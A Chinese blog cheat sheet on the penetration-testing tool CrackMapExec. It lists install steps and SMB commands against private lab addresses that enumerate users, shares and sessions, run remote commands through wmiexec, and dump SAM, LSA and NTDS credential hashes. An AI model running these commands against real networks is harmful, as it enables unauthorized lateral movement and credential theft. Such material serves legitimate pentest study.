当前位置:   article > 正文

windows内网渗透之CrackMapExec

crackmapexec


简介

 cme(CrackMapExec)内网渗透利器

实际使用

安装

最方便:

apt-get install crackmapexec

避免有坑:

  1. apt-get install -y libssl-dev libffi-dev python-dev build-essential
  2. pip install --user pipenv
  3. git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
  4. cd CrackMapExec && pipenv install
  5. pipenv shell
  6. python setup.py install

 常用命令总结

  1. #### 列出共享
  2. cme smb 192.168.127.235 -u admin -p 'abc123456' --shares
  3. #### 列出会话
  4. cme smb 192.168.127.235 -u admin -p 'abc123456' --sessions
  5. #### 列出磁盘信息
  6. cme smb 192.168.127.235 -u admin -p 'abc123456' --disks
  7. #### 列出登录的用户
  8. cme smb 192.168.127.235 -u admin -p 'abc123456' --loggedon-users
  9. #### 列出域用户
  10. cme smb 192.168.127.235 -u admin -p 'abc123456' --users
  11. #### 根据唯一的RID列出所有的用户
  12. cme smb 192.168.127.235 -u admin -p 'abc123456' --rid-brute
  13. #### 列出域组
  14. cme smb 192.168.127.235 -u admin -p 'abc123456' --groups
  15. #### 列出本地组
  16. cme smb 192.168.127.235 -u admin -p 'abc123456' --local-groups
  17. #### 列出域密码策略
  18. cme smb 192.168.127.235 -u admin -p 'abc123456' --pass-pol
  19. #### 尝试空会话
  20. cme smb 192.168.127.235 -u '' -p ''
  21. #### 列出指定域信息
  22. cme smb 192.168.127.235 -u admin -p 'abc123456' -d LABNET
  23. #### 列出ntds.dit的历史信息
  24. cme smb 192.168.127.235 -u admin -p 'abc123456' --ntds-history
  25. #### 爬行C盘目录信息
  26. cme smb 192.168.127.235 -u admin -p 'abc123456' --spider C\$ --pattern txt
  27. cme smb 192.168.127.235 -u admin -p 'abc123456' --spider C\$
  28. #### 远程执行命令
  29. cme smb 192.168.127.235 -u admin -p 'abc123456' -X '$PSVersionTable' --exec-method wmiexec
  30. cme smb 192.168.127.235 -u admin -p 'abc123456' -X '$set' --exec-method wmiexec
  31. cme smb 192.168.127.235 -u admin -p 'abc123456' -X '$whoami' --exec-method wmiexec
  32. cme smb 192.168.127.235 -u admin -p 'abc123456' -X 'whoami' --exec-method wmiexec
  33. cme smb 192.168.127.235 -u admin -p 'abc123456' -X 'ipconfig /all' --exec-method wmiexec
  34. cme smb 192.168.127.235 -u admin -p 'abc123456' -X 'tasklist /svc' --exec-method wmiexec
  35. cme smb 192.168.127.235 -u admin -p 'abc123456' -x ipconfig

语句格式

基本探测

  1. crackmapexec protocol test.com
  2. crackmapexec protocol 192.168.3.70/24
  3. crackmapexec protocol 192.168.3.70-77 192.168.4.1-20
  4. crackmapexec protocol ~/ip.txt

携带认证信息

  1. crackmapexec protocol 192.168.3.70 -u administrator -p 'abc12345'
  2. crackmapexec protocol 192.168.3.70 -u='-administrator' -p='-abc12345'
  3. //第一个字母为-的特殊情况语句

协议探测

  1. #crackmapexec smb 192.168.3.73-76
  2. SMB 192.168.3.73 445 SRV-WEB-KIT
  3. [*] Windows Server 2012 R2 Datacenter 9600
  4. (name:SRV-WEB-KIT) (domain:rootkit.org)
  5. (signing:False) (SMBv1:True)
  6. SMB 192.168.3.76 445
  7. PC-MICLE-KIT [*] Windows 8.1 Pro 9600
  8. (name:PC-MICLE-KIT) (domain:rootkit.org)
  9. (signing:False) (SMBv1:True)

执行命令

crackmapexec smb 192.168.3.144 -u administrator -p 'abc12345' -x whoami

凭证获取

  1. crackmapexec smb 192.168.3.144 -u administrator -p 'abc12345' --sam
  2. crackmapexec smb 192.168.3.73-144 -u administrator -p 'abc12345' --lsa
  3. crackmapexec smb 192.168.3.73-144 -u administrator -p 'abc12345' --ntds
  4. crackmapexec smb 192.168.3.73-144 -u administrator -p 'abc12345' --ntds vss
  5. crackmapexec smb 192.168.3.73-144 -u administrator -p 'abc12345' --ntds-history

Sessions枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --sessions

共享枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --shares

磁盘枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --disk

登录用户枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --loggedon-users

RID爆破枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --rid-brute

域用户枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --users

组枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --groups

本地组枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --local-groups

域密码策略枚举

crackmapexec smb 192.168.3.76-144 -u administrator -p 'abc12345' --pass-pol

记录一下方便以后查看。有一些命令是网上查的。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/黑客灵魂/article/detail/867699
推荐阅读
相关标签
  

闽ICP备14008679号